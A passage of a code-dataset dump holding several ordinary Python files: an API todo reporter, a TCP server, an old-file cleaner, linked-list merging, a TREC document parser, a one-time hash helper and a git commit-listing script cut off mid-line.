+{"seq_id":"392503240","text":"#!/usr/bin/python3\n\"\"\"task 0\"\"\"\nimport requests\nimport sys\nif __name__ == '__main__':\n    if len(sys.argv) == 2 and sys.argv[1].isdigit():\n        arg = sys.argv[1]\n        res1 = requests.get('https://jsonplaceholder.typicode.com/todos')\n        res2 = requests.get('https://jsonplaceholder.typicode.com/users')\n        s = res1.json()\n        usr = res2.json()\n        for y in usr:\n            if y['id'] == int(arg):\n                user = y['name']\n        Max = 0\n        Done = 0\n        titles = []\n        for i in s:\n            for key, value in i.items():\n                if key == 'userId' and value == int(arg):\n                    Max += 1\n                    for key, value in i.items():\n                        if key == 'completed' and value is True:\n                            Done += 1\n                            titles.append(i['title'])\n        print('Employee {} is done with tasks({}/{}):'.format(user, Done, Max))\n        for i in titles:\n            print('\\t 
{}'.format(i))\n","sub_path":"0x15-api/0-gather_data_from_an_API.py","file_name":"0-gather_data_from_an_API.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"484958553","text":"import time\nimport socket\nimport threading\nimport selectors\nfrom ANETTEST.AutoNET.Socket._Tool import get_my_ip, get_socket_buffer_size\nfrom ANETTEST.AutoNET.Socket._decode import cut_message_by_head, get_data_len, decode_message\nfrom ANETTEST.AutoNET.Socket._decode import LEN_TOTAL, build_tx_message\n\n\nclass TcpServer(object):\n\n def __init__(self, recv_cb, event_cb, error_cb, port, rx_length=256, launch_delay=0):\n # CALLBACK\n self._recv_cb = recv_cb\n self._event_cb = event_cb\n self._error_cb = error_cb\n # TCP\n self._select = None\n self._tcp = None\n self._is_bound = False\n self._port = port\n self._clients = dict() # {socket_conn: '10.10.10.10'}\n self._rx_length = rx_length\n self._rx_buffer = bytes()\n # Thread\n self._thread = threading.Thread(target=self._working)\n self._thread_interval = 2\n self._thread.daemon = True\n self._thread_delay = launch_delay\n self._thread.start()\n\n def _working(self):\n time.sleep(self._thread_delay)\n self._tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1) # SO_REUSEADDR, SO_REUSEPORT\n self._tcp.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, get_socket_buffer_size())\n self._tcp.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, get_socket_buffer_size())\n self._select = selectors.DefaultSelector()\n self._select.register(self._tcp, selectors.EVENT_READ, self._accept)\n while 1:\n if self._is_bound:\n events = self._select.select(timeout=self._thread_interval)\n for key, mask in events:\n callback = key.data\n callback(key.fileobj)\n else:\n host_ip = self.get_my_ip()\n if host_ip:\n try:\n self._tcp.bind((host_ip, self._port))\n self._tcp.listen()\n self._is_bound = True\n except socket.error as err:\n self._error_cb(module='ANET_TCP', code='BIND', value=err)\n time.sleep(self._thread_interval)\n self._event_cb(module='ANET_TCP', code='BIND', value=(self._is_bound, (host_ip, self._port)))\n else:\n print('[ERROR] ANET_SERVER: Network is unreachable')\n\n def _recv_length(self, conn, rx_length):\n rx_msg = bytes()\n try:\n msg = conn.recv(rx_length)\n if msg:\n rx_msg += msg\n else:\n self._client_lost(conn=conn)\n except (BlockingIOError, socket.timeout, OSError) as err:\n print(' BlockingIOError', err)\n except (ConnectionResetError, ConnectionAbortedError) as err:\n print(' ConnectionResetError', err)\n self._client_lost(conn=conn)\n return rx_msg\n\n def _recv(self, conn):\n # RX ONE MESSAGE\n self._rx_buffer += self._recv_length(conn=conn, rx_length=self._rx_length)\n while self._rx_buffer:\n # CUT_TO_HEAD\n msg_with_head = cut_message_by_head(buffer=self._rx_buffer)\n if not msg_with_head:\n break\n # GET_DATA_LEN\n data_len, miss_len = get_data_len(msg_with_head=msg_with_head)\n if miss_len > 0: # MISS_DATA\n new_buffer = self._recv_length(conn=conn, rx_length=miss_len)\n if new_buffer:\n self._rx_buffer += new_buffer\n else:\n break\n else: # PARSE_DATA\n data, self._rx_buffer, error = decode_message(msg_with_head=msg_with_head, data_len=data_len)\n if data:\n self._recv_cb(rx_msg=data, ip=self._clients[conn])\n if error:\n self._error_cb(module='ANET_TCP', code=error, value=self._rx_buffer)\n\n def _conn_send(self, conn, data: bytes):\n bytes_sent = 0\n try:\n msg, msg_len = 
build_tx_message(data=data)\n            bytes_sent = conn.send(msg)\n            if bytes_sent != msg_len:\n                print('[ERROR], TCP_TX', f'{bytes_sent}/{len(msg)}', msg)\n                self._error_cb(module='ANET_TCP', code='TX_BUF_OVERFLOW', value=msg)\n                bytes_sent -= LEN_TOTAL\n        except (BlockingIOError, socket.timeout, OSError) as err:\n            pass\n        except (ConnectionResetError, ConnectionAbortedError) as err:\n            self._error_cb(module='ANET_TCP', code='SEND', value=err)\n            self._client_lost(conn)\n        return bytes_sent\n\n    # SEND\n    def send_to(self, data, ip):\n        bytes_sent = 0\n        if ip in self._clients.values():\n            conn = list(self._clients.keys())[list(self._clients.values()).index(ip)]\n            bytes_sent = self._conn_send(conn, data)\n        return bytes_sent\n\n    def send_broadcast(self, data):\n        arrived_clients_ip = list()\n        if self._clients:\n            for conn in list(self._clients.keys()):\n                bytes_sent = self._conn_send(conn, data)\n                if bytes_sent:\n                    arrived_clients_ip.append(self._clients[conn])\n        return arrived_clients_ip\n\n    # ACCEPT / LOST\n    def _accept(self, sock):\n        conn, addr = sock.accept()\n        ip, port = addr\n        self._clients[conn] = ip\n        self._select.register(conn, selectors.EVENT_READ, self._recv)\n        self._event_cb(module='ANET_TCP', code='CONNECT', value=(True, (ip, self._port)))\n\n    def _client_lost(self, conn):\n        if conn in self._select.get_map():\n            self._select.unregister(conn)\n        if conn in self._clients:\n            ip = self._clients[conn]\n            conn.close()\n            self._clients.pop(conn)\n            self._event_cb(module='ANET_TCP', code='CONNECT', value=(False, (ip, self._port)))\n\n    # FUNC\n    def is_bound(self):\n        return self._is_bound\n\n    def get_client_ips(self):\n        return list(self._clients.values())\n\n    def is_connected(self):\n        return True if list(self._clients.values()) else False\n\n    def disconnect_all(self):\n        for conn in list(self._clients.keys()):\n            self._client_lost(conn=conn)\n\n    @staticmethod\n    def get_my_ip():\n        return get_my_ip()\n\n    def get_server_port(self):\n        return self._port\n\n    def exit(self):\n        self._tcp.close()\n\n\nif __name__ == '__main__':\n\n    def recv_cb_(rx_msg, ip):\n        print(f'TCP_RX: {rx_msg} ({ip})')\n\n    def event_cb_(module, code, value):\n        print(f'EVENT_RX: {module} {code} {value}')\n\n    def error_cb_(module, code, value):\n        print(f'ERROR: {module} {code} {value}')\n\n    SER_PORT = 10001\n\n    server = TcpServer(recv_cb_, event_cb_, error_cb_, port=SER_PORT)\n    print('MY_IP=', server.get_my_ip())\n    while 1:\n        time.sleep(2)\n        server.send_broadcast(b'message from server')\n","sub_path":"ANETTEST/AutoNET/Socket/TcpServer.py","file_name":"TcpServer.py","file_ext":"py","file_size_in_byte":7024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"230589731","text":"from threading import Timer, Thread\nfrom functools import partial\nfrom os import remove, path, stat, walk\nfrom platform import system\nfrom time import time\n\n\ndef get_file_creation_date(filepath: str) -> float:\n    if system() == \"Windows\":\n        return path.getctime(filepath)\n    else:\n        meta = stat(filepath)\n        try:\n            return meta.st_birthtime\n        except AttributeError:\n            return meta.st_mtime\n\n\ndef get_all_files_in_dir(dir: str) -> list:\n    filepaths = []\n\n    for pack in walk(dir):\n        for f in pack[2]:\n            # keep the full path so the stat/remove calls below work outside the cwd\n            filepaths.append(path.join(pack[0], f))\n\n    return filepaths\n\n\ndef del_old_files_in_dir(path: str, age: int = 0):\n    def _del_old_files_in_dir(path: str, age: int = 0):\n        filepaths = get_all_files_in_dir(path)\n\n        for filepath in filepaths:\n            crt_time = get_file_creation_date(filepath)\n            if time() - crt_time > age:\n                Thread(target=remove, 
args=[filepath]).start()\n\n    Thread(target=_del_old_files_in_dir, args=[path, age]).start()\n\n\ndef del_old_files_in_dir_periodic(interval: int, path: str, age: int = 0):\n    Timer(interval, partial(del_old_files_in_dir, path, age)).start()\n","sub_path":"wb/utils/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"325257381","text":"# 3.6 Installing additional modules\n\n\"\"\"\nThere is a set of files, each of which, except the last one, contains the name of the next file.\nThe first word in the text of the last file is \"We\".\n\nDownload the provided file. It contains a link to the first file of this set.\n\nAll the files live in the directory at:\nhttps://stepic.org/media/attachments/course67/3.6.3/\n\nUpload the contents of the last file of the set as the answer to this task.\n\"\"\"\n\nimport requests\n\nurl = 'https://stepic.org/media/attachments/course67/3.6.3/699991.txt'\nwhile True:\n    r = requests.get(url)\n    t = r.text.split()\n    if t[0] == 'We':\n        with open(r'D:\\Python\\dataset_3378_result.txt', 'w', encoding='utf-8') as inf:\n            inf.write(r.text)\n        break\n    else:\n        url = 'https://stepic.org/media/attachments/course67/3.6.3/' + r.text","sub_path":"3/3.6.3.py","file_name":"3.6.3.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"78596048","text":"'''\n\n'''\n\nclass ListNode(object):\n    def __init__(self, val, next=None):\n        self.val = val\n        self.next = next\n\ndef mergeTwoLists_iteratively(l1,l2):\n    dummy = cur = ListNode(0)\n    while l1 and l2:\n        if l1.val < l2.val:\n            cur.next = l1\n            l1=l1.next\n        else:\n            cur.next = l2\n            l2=l2.next\n        cur = cur.next\n    cur.next = l1 or l2\n    return dummy.next\n\ndef mergeTwoLists_recursively(l1, l2):\n    if not l1 or not l2:\n        return l1 or l2\n    if l1.val< l2.val:\n        print(l1.val,\" is less than \",l2.val)\n        l1.next = mergeTwoLists_recursively(l1.next,l2)\n        print(\"Move \",l1.val,\" to smaller between \",l1.next.val,l2.val)\n        return l1\n    else:\n        print(l2.val,\" is less than \",l1.val)\n        l2.next = mergeTwoLists_recursively(l1,l2.next)\n        print(\"Move \",l2.val,\" to smaller between \",l1.val,l2.next.val)\n        return l2\n\nl1 = ListNode(3,ListNode(5,ListNode(6)))\nl2 = ListNode(1,ListNode(2, ListNode(4, ListNode(7))))\nh = mergeTwoLists_iteratively(l1,l2)\nwhile h:\n    print(h.val)\n    h = h.next","sub_path":"GoogleTopQues/21_mergeTwoLists.py","file_name":"21_mergeTwoLists.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"454604217","text":"class Edge:\n    \"\"\"\n    An edge which records two centers and two adjacent corners\n    \"\"\"\n    def __init__(self, id, center1, center2, vertex1, vertex2, is_border):\n        self.id = id\n        self.d0 = center1\n        self.d1 = center2\n        self.v0 = vertex1\n        self.v1 = vertex2\n        self.is_border = is_border\n","sub_path":"cartograph/border_graph/Edge.py","file_name":"Edge.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"83948217","text":"#! 
/usr/bin/env python3\n\nimport functions # this imports all functions in the file functions\n\t\t\t\t # you can import this as another name if the name of the module is large or too long.\n\t\t\t\t # e.g import functions as f\n\nfrom functions_2 import preety_Print # This imports the preety_Print function only\n\t\t\t\t\t\t\t\t\t # You can also import function as\n\t\t\t\t\t\t\t\t\t # e.g from functions_2 import preety_print as p_p\n\t\t\t\t\t\t\t\t\t # you can import all functions with *\n\t\t\t\t\t\t\t\t\t # e.g from functions_2 import *\n\n\nthree_hundred = functions.add(1, 299)\nprint(three_hundred)\n\nd = {\n\t'first_name' : 'Eric',\n\t'last_name' : 'Mwamodo',\n\t'age' : 23,\n\t'location' : 'Wundanyi'\n}\n\npreety_Print(d)\n","sub_path":"Basics/10-07-2016/imports__.py","file_name":"imports__.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"446597119","text":"from flask import make_response, request, session\nfrom datetime import date, datetime, timedelta\nfrom .db import db\nimport time\nimport random\nimport string\n\nclass security :\n def __init__(self):\n self.table = 'security'\n self.valid_duration = 60 * 10\n\n def get_hash(self) :\n obj_database = db()\n security_hash = self.hash_generator()\n query = ('INSERT INTO ' + self.table + ' (security_hash, security_time, security_used) VALUES (%s, %s, %s)')\n data = (security_hash, time.strftime('%Y-%m-%d %H:%M:%S'), 0)\n\n if obj_database.insert(query, data) != False :\n return security_hash\n else :\n return False\n\n def check_hash(self, hash='') :\n obj_database = db()\n query = ('SELECT * FROM ' + self.table + ' WHERE security_hash=%s AND security_used!=%s')\n data = (hash, 1, )\n security_records = obj_database.select(query, data)\n\n if len(security_records) > 0 :\n if int(datetime.now().timestamp()) - int(datetime.timestamp(security_records[0]['security_time'])) < self.valid_duration :\n query = ('UPDATE ' + self.table + ' SET security_used=%s WHERE security_hash=%s')\n data = (1, hash)\n obj_database.update(query, data)\n\n return True\n else :\n return False\n else :\n return False\n\n def hash_generator(self) :\n letters = string.ascii_lowercase + '1234567890'\n return ''.join(random.choice(letters) for i in range(32))\n","sub_path":"src/pm_server/modules/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"355093434","text":"import os.path\nimport datetime\nimport re\nimport gzip\n\ndocNoKey = \"DOCNO\"\ndateTimeKey = \"DATE_TIME\"\ndocTypeKey = \"DOCTYPE\"\nheaderKey = \"HEADER\"\nslugKey = \"SLUG\"\ntrailerKey = \"TRAILER\"\nheadlineKey = \"HEADLINE\"\npKey = \"P\"\nbodyKey = \"BODY\"\ntextKey = \"TEXT\"\ndocKey = \"DOC\"\n\n\nclass Document:\n\tdef __init__(self):\n\t\t\"\"\"\n\t\t\tInitialize the document\n\t\t\"\"\"\n\t\tself.docNo = \"\"\n\t\tself.dateTime = \"\"\n\t\tself.header = \"\"\n\t\tself.docType = \"\"\n\t\tself.slug = \"\"\n\t\tself.headline = \"\"\n\t\tself.trailer = \"\"\n\t\tself.body = \"\"\n\t\tself.comparableDateTime = None\n\t\tself.paragraphs = []\n\n\tdef __str__(self):\n\t\t\"\"\"\n\t\t\tsimple tostring method, used for the developer to see what the object looks like (need to cleanse single quotes)\n\t\t\"\"\"\n\n\t\tparagraphText = \"\"\n\t\tfor paragraph in self.paragraphs:\n\t\t\tparagraphText += paragraph\n\n\t\treturn \"\"\"\n\t\t{\n\t\t\tdocNo: 
'%s',\n\t\t\tdateTime: '%s',\n\t\t\theader: '%s',\n\t\t\tslug: '%s',\n\t\t\theadline: '%s',\n\t\t\ttrailer: '%s',\n\t\t\tbody: '%s',\n\t\t\tparagraphs: '%s'\n\t\t}\n\t\t\"\"\" % (self.docNo, self.dateTime, self.header, self.slug, self.headline, self.trailer, self.body, paragraphText)\n\n\tdef getComparableDate(self):\n\t\tbeginningOfTime = datetime.datetime(1970, 1, 1)\n\n\t\ttry:\n\t\t\tbeginningOfTime = datetime.datetime.strptime(re.sub(\"\\\\s+\", \"\", self.dateTime)[0:10], \"%Y-%m-%d\")\n\t\texcept:\n\t\t\tpass\n\n\t\treturn beginningOfTime\n\n\t@staticmethod\n\tdef cleanseParagraph(paragraph):\n\t\tbeginningArticles = [\"--\", \"_\"]\n\t\taltParagraph = paragraph\n\n\t\tfor beginningArticle in beginningArticles:\n\t\t\tresult = altParagraph.find(beginningArticle, 0)\n\n\t\t\tif result > -1:\n\t\t\t\tsubStr = altParagraph[0:result]\n\t\t\t\tuppers = [l for l in subStr if l.isupper()]\n\n\t\t\t\tif float(len(uppers)) > float(len(subStr) / 2):\n\t\t\t\t\taltParagraph = altParagraph[result+len(beginningArticle):]\n\t\t\t\t\tbreak\n\n\t\treturn altParagraph\n\n\t@staticmethod\n\tdef build(objectDictionary):\n\t\t\"\"\"\n\t\t\tbuild the document object given a dictionary with string keys and array of strings values: { 'key', [ 'first', 'second' ]}\n\t\t\"\"\"\n\n\t\tnewDocument = Document()\n\n\t\tif docNoKey in objectDictionary:\n\t\t\tfor item in objectDictionary[docNoKey]:\n\t\t\t\tnewDocument.docNo += unicode(item, errors='replace')\n\n\t\tif docTypeKey in objectDictionary:\n\t\t\tfor item in objectDictionary[docTypeKey]:\n\t\t\t\tnewDocument.docType += unicode(item, errors='replace')\n\n\t\tif dateTimeKey in objectDictionary:\n\t\t\tfor item in objectDictionary[dateTimeKey]:\n\t\t\t\tnewDocument.dateTime += unicode(item, errors='replace')\n\n\t\tif headerKey in objectDictionary:\n\t\t\tfor item in objectDictionary[headerKey]:\n\t\t\t\tnewDocument.header += unicode(item, errors='replace')\n\n\t\tif slugKey in objectDictionary:\n\t\t\tfor item in objectDictionary[slugKey]:\n\t\t\t\tnewDocument.slug += unicode(item, errors='replace')\n\n\t\tif headlineKey in objectDictionary:\n\t\t\tfor item in objectDictionary[headlineKey]:\n\t\t\t\tnewDocument.headline += unicode(item, errors='replace')\n\n\t\tif trailerKey in objectDictionary:\n\t\t\tfor item in objectDictionary[trailerKey]:\n\t\t\t\tnewDocument.trailer += unicode(item, errors='replace')\n\n\t\tif pKey in objectDictionary:\n\t\t\tfor item in objectDictionary[pKey]:\n\t\t\t\tnewDocument.paragraphs.append(unicode(item, errors='replace'))\n\t\telif textKey in objectDictionary:\n\t\t\tfor item in objectDictionary[textKey]:\n\t\t\t\tnewDocument.paragraphs.append(Document.cleanseParagraph(unicode(item, errors='replace')))\n\n\t\tif bodyKey in objectDictionary:\n\t\t\tfor item in objectDictionary[bodyKey]:\n\t\t\t\tnewDocument.body += unicode(item, errors='replace')\n\n\t\treturn newDocument\n\n\t@staticmethod\n\tdef returnCharsFromDocument(filePath, seekToId):\n\t\t\"\"\"\n\t\t\treturn the characters from a document\n\t\t\"\"\"\n\t\tif filePath[-3:] == \".gz\":\n\t\t\tdocFile = gzip.open(filePath)\n\t\telse:\n\t\t\tdocFile = open(filePath, 'r')\n\n\t\tif seekToId is not None:\n\t\t\tpos = 0\n\t\t\tprevpos = 0\n\t\t\tline = \"\"\n\t\t\twhile seekToId not in line:\n\t\t\t\tprevpos = pos\n\t\t\t\tpos = docFile.tell()\n\t\t\t\tline = docFile.readline()\n\n\t\t\tif seekToId in line:\n\t\t\t\tif docNoKey in line:\n\t\t\t\t\toffset = prevpos - docFile.tell()\n\t\t\t\telse:\n\t\t\t\t\toffset = pos - docFile.tell()\n\t\t\t\tdocFile.seek(offset, 
1)\n\t\t\telse:\n\t\t\t\traise IOError(\"Could not find topic \" + seekToId + \" in file \" + filePath)\n\n\t\twhile True:\n\t\t\tc = docFile.read(1)\n\n\t\t\tif not c:\n\t\t\t\treturn\n\n\t\t\tyield c\n\n\t@staticmethod\n\tdef returnCharsFromString(largeString):\n\t\t\"\"\"\n\t\t\treturn the characters from a string\n\t\t\"\"\"\n\t\tfor char in largeString:\n\t\t\tyield char\n\n\t@staticmethod\n\tdef factoryFromIndexer(documentIndexer):\n\t\tif documentIndexer == None:\n\t\t\treturn None\n\n\t\tindex = 0\n\t\tactualString = \"\"\n\t\tfor char in Document.returnCharsFromDocument(documentIndexer.fileName):\n\t\t\tif index >= documentIndexer.start and index <= documentIndexer.end:\n\t\t\t\tactualString += char\n\t\t\telif index > documentIndexer.end:\n\t\t\t\treturn Document.factory(actualString)\n\n\t\t\tindex += 1\n\n\t@staticmethod\n\tdef factoryForSpecificDocNo(inputFileName, docNo):\n\t\t\"\"\"\n\t\t\tbuild 1 document given an input and doc number\n\t\t\"\"\"\n\n\t\tcharMethod = Document.returnCharsFromDocument\n\n\t\ttagStack = []\n\t\tcurrentTag = \"\"\n\t\tcurrentObject = {}\n\n\t\tseenOpeningTag = False\n\t\tseenClosingTag = False\n\t\tseenClosingXml = False\n\t\tworkspace = \"\"\n\n\t\tfoundDocNo = False\n\n\t\tfor c in charMethod(inputFileName, docNo):\n\t\t\t# print c,\n\t\t\tif c == \"<\":\n\t\t\t\tseenOpeningTag = True\n\t\t\t\ttagStackLen = len(tagStack)\n\n\t\t\t\tif tagStackLen > 0:\n\t\t\t\t\tlastTag = tagStack[tagStackLen - 1]\n\t\t\t\t\t# check if we found the docno\n\t\t\t\t\tif lastTag == docNoKey and workspace.strip() == docNo:\n\t\t\t\t\t\tfoundDocNo = True\n\n\t\t\t\t\tif lastTag in currentObject and foundDocNo:\n\t\t\t\t\t\tcurrentObject[lastTag].append(workspace)\n\t\t\t\t\telif foundDocNo:\n\t\t\t\t\t\tcurrentObject[lastTag] = [workspace]\n\n\t\t\t\tcurrentTag = \"\"\n\t\t\t\tworkspace = \"\"\n\t\t\telif c == \"/\" and seenOpeningTag:\n\t\t\t\tseenClosingXml = True\n\t\t\telif c == \">\" and seenOpeningTag:\n\t\t\t\t# remove the last one\n\t\t\t\tif seenClosingXml and len(tagStack) > 0:\n\t\t\t\t\ttagStack.pop()\n\t\t\t\telse:\n\t\t\t\t\tif currentTag[:4] == \"DOC \" and docNo in currentTag:\n\t\t\t\t\t\tfoundDocNo = True\n\t\t\t\t\t\ttagStack.append(\"DOC\")\n\t\t\t\t\t\tcurrentObject[docNoKey] = [docNo]\n\t\t\t\t\telse:\n\t\t\t\t\t\ttagStack.append(currentTag)\n\n\t\t\t\tseenOpeningTag = False\n\t\t\t\tseenClosingXml = False\n\t\t\t\tseenClosingTag = False\n\t\t\t\tworkspace = \"\"\n\n\t\t\t\tendedXmlDoc = len(tagStack) == 0\n\t\t\t\tif endedXmlDoc and foundDocNo:\n\t\t\t\t\treturn Document.build(currentObject)\n\t\t\t\telif endedXmlDoc:\n\t\t\t\t\tcurrentObject = {}\n\t\t\telif seenOpeningTag:\n\t\t\t\tcurrentTag += c\n\t\t\telse:\n\t\t\t\tworkspace += c\n\t\treturn None\n\n\t@staticmethod\n\tdef factory(input, isFile=False):\n\t\t\"\"\"\n\t\t\tbuild a single document given an input\n\t\t\"\"\"\n\t\tresult = list(Document.factoryMultiple(input, isFile))\n\n\t\tif len(result) > 0:\n\t\t\treturn result[0]\n\t\treturn None\n\n\t@staticmethod\n\tdef factoryMultiple(input, isFile=False, isSingle=True):\n\t\t\"\"\"\n\t\t\tbuild multiple documents given an input\n\t\t\"\"\"\n\n\t\tcharMethod = Document.returnCharsFromString\n\n\t\tif isFile:\n\t\t\tcharMethod = Document.returnCharsFromDocument\n\n\t\ttagStack = []\n\t\tcurrentTag = \"\"\n\t\tcurrentObject = {}\n\n\t\tseenOpeningTag = False\n\t\tseenClosingTag = False\n\t\tseenClosingXml = False\n\t\tworkspace = \"\"\n\n\t\tfor c in charMethod(input):\n\t\t\tif c == \"<\":\n\t\t\t\tseenOpeningTag = 
True\n\n\t\t\t\ttagStackLen = len(tagStack)\n\n\t\t\t\tif tagStackLen > 0:\n\t\t\t\t\tlastTag = tagStack[tagStackLen - 1]\n\t\t\t\t\tif lastTag in currentObject:\n\t\t\t\t\t\tcurrentObject[lastTag].append(workspace)\n\t\t\t\t\telse:\n\t\t\t\t\t\tcurrentObject[lastTag] = [workspace]\n\n\t\t\t\tcurrentTag = \"\"\n\t\t\t\tworkspace = \"\"\n\t\t\telif c == \"/\" and seenOpeningTag:\n\t\t\t\tseenClosingXml = True\n\t\t\telif c == \">\" and seenOpeningTag:\n\t\t\t\t# remove the last one\n\t\t\t\tif seenClosingXml and len(tagStack) > 0:\n\t\t\t\t\ttagStack.pop()\n\t\t\t\telse:\n\t\t\t\t\ttagStack.append(currentTag)\n\n\t\t\t\tseenOpeningTag = False\n\t\t\t\tseenClosingXml = False\n\t\t\t\tseenClosingTag = False\n\t\t\t\tworkspace = \"\"\n\n\t\t\t\tif len(tagStack) == 0:\n\t\t\t\t\tyield Document.build(currentObject)\n\n\t\t\t\t\t# don't want to compute more than we have to...\n\t\t\t\t\tif isSingle:\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\tcurrentObject = {}\n\n\t\t\telif seenOpeningTag:\n\t\t\t\tcurrentTag += c\n\t\t\telse:\n\t\t\t\tworkspace += c","sub_path":"src/extract/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":7846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"513336627","text":"import git\nimport os\nimport datetime\nimport argparse\nfrom re import search\n\ndef validateDate(date_text):\n    if (date_text != None):\n        try:\n            datetime.datetime.strptime(str(date_text), '%Y-%m-%d')\n        except Exception as e:\n            raise Exception(\"Formato de data inválido, deve ser YYYY-MM-DD\")\n\ndef validateChave(chave):\n    if (chave != None):\n        chave = str(chave)\n        if (chave.startswith(\"C\") != True or len(chave) != 8):\n            raise Exception(\"Formato de chave inválido!\")\n\ndef validateTextoBusca(texto):\n    if (texto != None):\n        texto = str(texto)\n        if(len(texto) > 0):\n            print(\"\")\n            print(\"Texto de Busca a aplicar: \" + texto)\n            print(\"\")\n        else:\n            raise Exception(\"Texto de Busca nao foi fornecido!\")\n\n\ndef montarFiltroLog(args):\n    filtro = []\n    filtro.append(\"git\")\n    filtro.append(\"rev-list\")\n    filtro.append(\"--remotes\")\n\n    if (args.start_date):\n        filtro.append('--after=' + str(args.start_date) + 'T00:00:01')\n    if (args.end_date):\n        filtro.append('--until=' + args.end_date + 'T23:59:59')\n    if (args.key):\n        filtro.append('--author=' + args.key)\n\n    # if (len(filtro) > 0):\n    #     filtro.append(\"--pretty=format:%H\")\n\n    if (args.texto_busca):\n        filtro.append('--grep=' + args.texto_busca)\n\n    print(\"\")\n    print(\"Comando executado:\")\n    print(filtro)\n    print(\"\")\n\n    return filtro\n\ndef isArgumentoInformado(args):\n    return (args.start_date or args.end_date or args.key or args.hash or args.texto_busca)\n\n# Define the CLI filter arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--start-date\", \"-sd\", help=\"Data inicial do commit padrão (YYYY-mm-dd)\")\nparser.add_argument(\"--end-date\", \"-ed\", help=\"Data final do commit (YYYY-mm-dd)\")\nparser.add_argument(\"--key\", \"-k\", help=\"Chave C do usuário que realizou o commit\")\nparser.add_argument(\"--hash\", \"-ha\", help=\"Hash do commit a ser analisado\")\nparser.add_argument(\"--texto-busca\", \"-tb\", help=\"Texto a buscar nas mensagens de log dos commits. 
Exemplo: task 123456.\")\n\n# Parse the arguments\ninputArgs = parser.parse_args()\n\ndirpath = os.getcwd()\nfoldername = os.path.basename(dirpath) + \"/\"\narquivosNovos = []\narquivosModificados = []\n\ng = git.Git(dirpath.replace(\"\\\\\",\"/\"))\n\nif (not isArgumentoInformado(inputArgs)):\n    print(\"É necessário informar pelo menos um dos argumentos usados no filtro dos commits. Execute o programa com a opção --help ou -h\")\nelse:\n\n    if (inputArgs.hash):\n        print(\"Coletando dados dos arquivos criados...\")\n\n        loginfoAdicionados = g.execute([\"git\", \"show\", str(inputArgs.hash), \"--name-status\", \"--pretty=oneline\", \"--abbrev-commit\", \"--diff-filter=A\"])\n        linhasAdicionados = loginfoAdicionados.splitlines()\n\n        if len(linhasAdicionados) > 0:\n            arquivosNovos = arquivosNovos + list(\n                map(lambda x: foldername + x.replace('A\\t', '') + '#' + str(inputArgs.hash)[0:10], linhasAdicionados))\n\n        print(\"Coletando dados dos arquivos modificados...\")\n\n        loginfoModificados = g.execute([\"git\", \"show\", str(inputArgs.hash), \"--name-status\", \"--pretty=oneline\", \"--abbrev-commit\", \"--diff-filter=M\"])\n        linhasModificados = loginfoModificados.splitlines()\n\n        if len(linhasModificados) > 0:\n            arquivosModificados = arquivosModificados + list(\n                map(lambda x: foldername + x.replace('MM\\t', '').replace('M\\t', '') + '#' + str(inputArgs.hash)[0:10],\n                    linhasModificados))\n\n        arquivosNovosSet = set(arquivosNovos)\n        arquivosModificadosSet = set(arquivosModificados)\n\n        for novo in arquivosNovos:\n            arquivo = novo[:novo.index(\"#\")]\n\n            if (arquivo != foldername and arquivo.find(\".\")):\n                iguais = set(filter(lambda nome: search(arquivo, nome), arquivosModificados))\n                try:\n                    arquivosModificadosSet = arquivosModificadosSet.difference(iguais)\n                except ValueError:\n                    pass\n\n        arquivosNovos = list(arquivosNovosSet)\n        arquivosModificados = list(arquivosModificadosSet)\n\n        arquivosNovos.sort(key=lambda f: os.path.splitext(f)[1])\n        arquivosModificados.sort(key=lambda f: os.path.splitext(f)[1])\n\n        print('_______________Arquivos Novos_______________')\n        extensaoAnterior = ''\n        for x in arquivosNovos:\n            extensao = os.path.splitext(x)[1].split('#')[0]\n            if extensao != extensaoAnterior:\n                extensaoAnterior = extensao\n                print('##Arquivos com extensão ' + extensaoAnterior)\n            if (extensao != \"\"):\n                print(x.strip(\" \"))\n\n        print('_______________Arquivos Modificados_______________')\n        extensaoAnterior = ''\n        for x in arquivosModificados:\n            extensao = os.path.splitext(x)[1].split('#')[0]\n            if extensao != extensaoAnterior:\n                extensaoAnterior = extensao\n                print('##Arquivos com extensão ' + extensaoAnterior)\n            if (extensao != \"\"):\n                print(x)\n\n    else:\n        validateDate(inputArgs.start_date)\n        validateDate(inputArgs.end_date)\n        validateChave(inputArgs.key)\n        validateTextoBusca(inputArgs.texto_busca)\n        filtroLog = montarFiltroLog(inputArgs)\n\n        try:\n            logCommits = g.execute(filtroLog)\n            print(\"=\"*40)\n            print(\"COMMITS ENCONTRADOS\")\n            print(\"=\"*40)\n            print(logCommits)\n            commitsList = logCommits.splitlines()\n            print(\"=\"*40)\n            print(\"Total de COMMITS: {}\".format(len(commitsList)))\n            print(\"=\"*40)\n\n            print(\"Coletando dados dos arquivos criados...\")\n            for commit in commitsList:\n                loginfoAdicionados = g.execute([\"git\", \"show\", commit,\"--name-status\",\"--pretty=oneline\",\"--abbrev-commit\",\"--diff-filter=A\"])\n                